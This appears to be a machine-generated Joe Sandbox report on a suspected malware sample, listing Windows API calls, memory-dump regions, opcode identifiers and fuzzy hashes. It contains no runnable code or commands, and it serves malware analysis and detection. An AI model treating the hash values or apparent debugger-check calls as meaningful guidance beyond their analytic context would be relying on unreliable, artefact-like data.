                                                                  • Opcode ID: 84170dc5710c95569f884fa1c7197eada6b7c81067ea50a09d5e462a1dc774df
                                                                  • Instruction ID: d1c6a99880d4e693d8a93f67a3934470a05925f5e411fa1cea1f9c4edec481d3
                                                                  • Opcode Fuzzy Hash: 84170dc5710c95569f884fa1c7197eada6b7c81067ea50a09d5e462a1dc774df
                                                                  • Instruction Fuzzy Hash: 2FD22A71E086288FDF64CE28CD44BEABBB5EB85305F1445EAD40DE7240E778AE858F45
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,004923A2,00000002,00000000,?,?,?,004923A2,?,00000000), ref: 00492129
                                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,004923A2,00000002,00000000,?,?,?,004923A2,?,00000000), ref: 00492152
                                                                  • GetACP.KERNEL32(?,?,004923A2,?,00000000), ref: 00492167
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: 1b745d81bed6b03cc0e635320857af29b8b8963938003cd0f86630e220765df0
                                                                  • Instruction ID: 53e82d5e013bfd450fba54bded83829b6a5a63711e236b545c72b9d3a5668750
                                                                  • Opcode Fuzzy Hash: 1b745d81bed6b03cc0e635320857af29b8b8963938003cd0f86630e220765df0
                                                                  • Instruction Fuzzy Hash: 1121A122600101B6EF349F14CF07A9B7BA6BB50B50B568477EA09DB314E7B6DE51C358
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00492374
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004923B2
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 004923C5
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0049240D
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00492428
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                  • String ID:
                                                                  • API String ID: 415426439-0
                                                                  • Opcode ID: 1ac0b2311591edba5ed6b3afce81826914d5d22662d8b8c088368eee48dee0e0
                                                                  • Instruction ID: 687903443c8a7a67e2d140a39082b2e8ffd0c21b8d019e8072a1b617785a19b0
                                                                  • Opcode Fuzzy Hash: 1ac0b2311591edba5ed6b3afce81826914d5d22662d8b8c088368eee48dee0e0
                                                                  • Instruction Fuzzy Hash: B2518071A00606BBDF20DFA5CD45ABF7BB8BF14704F14447BE905EB290E7B899008B69
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c3187e9c7bbb624a67166fa6f06a2419e7bfe36684c1c794ff809602c00b74b1
                                                                  • Instruction ID: 6d92ce639aa496f6e71c8dde851e1ffc2c195cb9d7937dc2422e92f5b70fe04a
                                                                  • Opcode Fuzzy Hash: c3187e9c7bbb624a67166fa6f06a2419e7bfe36684c1c794ff809602c00b74b1
                                                                  • Instruction Fuzzy Hash: 96026B71E002199BDF14DFA9C9806AEFBF1FF48314F24866AD919E7380D775AA01CB94
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0047A523
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0047A5EF
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0047A60F
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0047A619
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: a1c443c8732f836316ae139279ad240f005736d6bc1d795f45fbd3b0338beaeb
                                                                  • Instruction ID: 860f38c42f918765c45d5507a4dc82787cb75bb3363df33cc9fe0e4957fa0125
                                                                  • Opcode Fuzzy Hash: a1c443c8732f836316ae139279ad240f005736d6bc1d795f45fbd3b0338beaeb
                                                                  • Instruction Fuzzy Hash: 573116B5D0121C9BDF10DFA5D989BCDBBB8BF18304F1040AAE44DAB250EB759A85CF49
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00491D68
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00491DB2
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00491E78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 661929714-0
                                                                  • Opcode ID: 540d2a0e5170c5407db356786f73bc2f95eae8793d138e653ed2a1f2afbb1de8
                                                                  • Instruction ID: 51941f2c6e1148cdf99ad9fe6abd44d3863a428694933b711cd45734a2246838
                                                                  • Opcode Fuzzy Hash: 540d2a0e5170c5407db356786f73bc2f95eae8793d138e653ed2a1f2afbb1de8
                                                                  • Instruction Fuzzy Hash: 676170715101079FDF28AF25CD86BBA7BA8EF44304F1041BBED05C62A9E778D951CB58
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0047112E), ref: 00481339
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0047112E), ref: 00481343
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0047112E), ref: 00481350
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 1ca6a73f44e2dcbf7899894c7e2670714f1bfa536a0ce056b5219f9fc07385bd
                                                                  • Instruction ID: 44b0d6135dfbae708b78770fbe8514308a8ea26c8e2eb12e951a2cdd653bd95e
                                                                  • Opcode Fuzzy Hash: 1ca6a73f44e2dcbf7899894c7e2670714f1bfa536a0ce056b5219f9fc07385bd
                                                                  • Instruction Fuzzy Hash: 8D31C47491122C9BCB21DF29D8897CDBBB8BF48314F5045EAE41CA7260E7749F858F49
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • EnumSystemLocalesW.KERNEL32(00491D14,00000001,00000000,?,-00000050,?,00492348,00000000,?,?,?,00000055,?), ref: 00491C60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID: H#I
                                                                  • API String ID: 2417226690-811699007
                                                                  • Opcode ID: ca968f19d3434b25111c7e7cf4a1c3825e3f56f6e20fafbb50b01417a3711ed8
                                                                  • Instruction ID: 1ada5fc201061ca29b48b939ae3cc11fd88bccf763764d38bc8a945b59753bd2
                                                                  • Opcode Fuzzy Hash: ca968f19d3434b25111c7e7cf4a1c3825e3f56f6e20fafbb50b01417a3711ed8
                                                                  • Instruction Fuzzy Hash: CC1125362003025FDF18AF39C8A16BABB92FF84358B14483EE98687B50D375B802C744
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                                  • Instruction ID: f9c209de501e00da9aa4800cf54dbb884ee7047bf9a7c4b0e6d90ad61cf0f090
                                                                  • Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                                  • Instruction Fuzzy Hash: 1972DB34628B488FDB69DF28C8857AAB3E5FB98310F14456ED89BCB241DF34E542CB45
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0048C9D8,?,?,00000008,?,?,00496395,00000000), ref: 0048CC0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: a8e8a79f641cd0f4748b28ca5010a19a11391751b5d9eac5549a4f8e5317b0c7
                                                                  • Instruction ID: c0be8005ae08d88e5168ebe630e90dbf96a4aa19d07c45bf2d219e1267e3c84c
                                                                  • Opcode Fuzzy Hash: a8e8a79f641cd0f4748b28ca5010a19a11391751b5d9eac5549a4f8e5317b0c7
                                                                  • Instruction Fuzzy Hash: 99B13C31610608DFD719DF28C4CAB697BE0FF45364F258A59E899CF2A1C339E982CB54
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0047A79B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: d23ef2c28825e0a8443b5a3a52b8e518a4f2e5d8807e7d2beaaf8f219d99a299
                                                                  • Instruction ID: 8cc9eb0632a1a5eff65e27b13a1ea917b6110d2f06ca09d8d748b30aa54118d2
                                                                  • Opcode Fuzzy Hash: d23ef2c28825e0a8443b5a3a52b8e518a4f2e5d8807e7d2beaaf8f219d99a299
                                                                  • Instruction Fuzzy Hash: 43519AB2D042058BDB14CF65E8813AEBBF0FB88310F15896AD509EB350E7789D11CF9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d01a8abbd33651ea250efa7768f2552507b4a353f6aebd3032a47142aa563275
                                                                  • Instruction ID: 77865479075a5232b25c149bc86a2fe169a80443aef911bebe86f951cfbe88ee
                                                                  • Opcode Fuzzy Hash: d01a8abbd33651ea250efa7768f2552507b4a353f6aebd3032a47142aa563275
                                                                  • Instruction Fuzzy Hash: 8441B5B5C0521DAFDF20EF6ACC89AAEBBB9EB45304F1446DEE419D3201DA349E448F54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: d541c47f849ea7e6c99a62f5ec37a4d65e3382c2153daeb7d88a0f7ae58e4cc0
                                                                  • Instruction ID: cfe5f69825f6c25ac12cbe556f3e5a1b0c4dceab76bdc545cdd1e4c6f2128cd1
                                                                  • Opcode Fuzzy Hash: d541c47f849ea7e6c99a62f5ec37a4d65e3382c2153daeb7d88a0f7ae58e4cc0
                                                                  • Instruction Fuzzy Hash: 60C1F1305106068FCB64DF68C5846BFBBB1AF06314F148A2FD49A97762C739AD4ECB19
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00491FBB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 3035e4d58ede684d1400839eeab15f32488d617bdccae1b863b248becaa51f01
                                                                  • Instruction ID: b3baf56accf421abd5099ebac85042fede2245e1615c2bcd73f8069bae9f9e96
                                                                  • Opcode Fuzzy Hash: 3035e4d58ede684d1400839eeab15f32488d617bdccae1b863b248becaa51f01
                                                                  • Instruction Fuzzy Hash: BE21B032610206ABEF28AA65DD42ABB7BA8EF44304F10407FFE01D6241EB78AD40C758
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00491F30,00000000,00000000,?), ref: 004921C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 92525d3a2c3f35cb6b16a5984d1b3617f6e0abbea99bc2a2e41f184e4ee9bc43
                                                                  • Instruction ID: 9c5791193cd5c25cb43e55f889eaf7a9c503d3c2036375cf1752dd841236c86c
                                                                  • Opcode Fuzzy Hash: 92525d3a2c3f35cb6b16a5984d1b3617f6e0abbea99bc2a2e41f184e4ee9bc43
                                                                  • Instruction Fuzzy Hash: 1C01FE32640116BBDF185B65CD4ABBB3F64EB40754F15447EED12A3280DA78FD41C698
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • EnumSystemLocalesW.KERNEL32(00491F67,00000001,00000000,?,-00000050,?,00492310,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00491CD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 919f55956097a848fdb721a724851919028951352b221235d63358d2c5c82fe3
                                                                  • Instruction ID: de4b0341d8259ea1c5fd0573007217ff5e434bb64ebfe52a550369b19b80dfd8
                                                                  • Opcode Fuzzy Hash: 919f55956097a848fdb721a724851919028951352b221235d63358d2c5c82fe3
                                                                  • Instruction Fuzzy Hash: 1FF022363403095FDB146F399885A6A7F95FB80768B15443EF9018B6A0C2B5AC01C648
                                                                  APIs
                                                                    • Part of subcall function 0048150A: EnterCriticalSection.KERNEL32(-0002B867,?,00486107,?,004A6B20,00000008,004862CB,CE3BFFFF,0047DE01,?,CE3BFFFF,0047DE01,0047112E,?,004813BE), ref: 00481519
                                                                  • EnumSystemLocalesW.KERNEL32(004886E3,00000001,004A6C80,0000000C,00488B18,00000000), ref: 00488728
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                  • String ID:
                                                                  • API String ID: 1272433827-0
                                                                  • Opcode ID: 2f322940a7bf6e70a9fb60a88de7ab0dca859d84b2172b64b350aab94d1c5715
                                                                  • Instruction ID: 0bb07cf6f3c27c0c32fc12ae0c45c612a3ea0b3bf2950741ad6e1fb60d9c4ac4
                                                                  • Opcode Fuzzy Hash: 2f322940a7bf6e70a9fb60a88de7ab0dca859d84b2172b64b350aab94d1c5715
                                                                  • Instruction Fuzzy Hash: C2F03732A40205EFEB00EF99E842B9D7BF0EB49725F10842FF4149B2A0CBB949008F48
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • EnumSystemLocalesW.KERNEL32(00491AFC,00000001,00000000,?,?,0049236A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00491BDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 767ec8b21375973968b5a0f9435497aa1c6e045e3e2e70fe174319ea39a0f3fa
                                                                  • Instruction ID: e41da9079f2662a9489cd576777bbd92677988525723ab51582a57c3241cb960
                                                                  • Opcode Fuzzy Hash: 767ec8b21375973968b5a0f9435497aa1c6e045e3e2e70fe174319ea39a0f3fa
                                                                  • Instruction Fuzzy Hash: 70F05C3A34020657CF04AF39D855B6A7F95EFC1710B06406EEA058B360D2799C42C758
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(00000094), ref: 00472E80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: e3c8ff343d3f79f251156b94c4b0d049e2073c0f5260fb30d0639c40a157a123
                                                                  • Instruction ID: 5e62d055715b0f8c095ab3712fc921c66bcc55c1fe0ce9da33c7b8213fea82c7
                                                                  • Opcode Fuzzy Hash: e3c8ff343d3f79f251156b94c4b0d049e2073c0f5260fb30d0639c40a157a123
                                                                  • Instruction Fuzzy Hash: 2CE01B31900318A7EF349A71DD45FE673789B51305F4041EAD60C56242E779894A9F56
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00484DAF,?,20001004,00000000,00000002,?,?,004843A1), ref: 00488C50
                                                                  Memory Dump Source
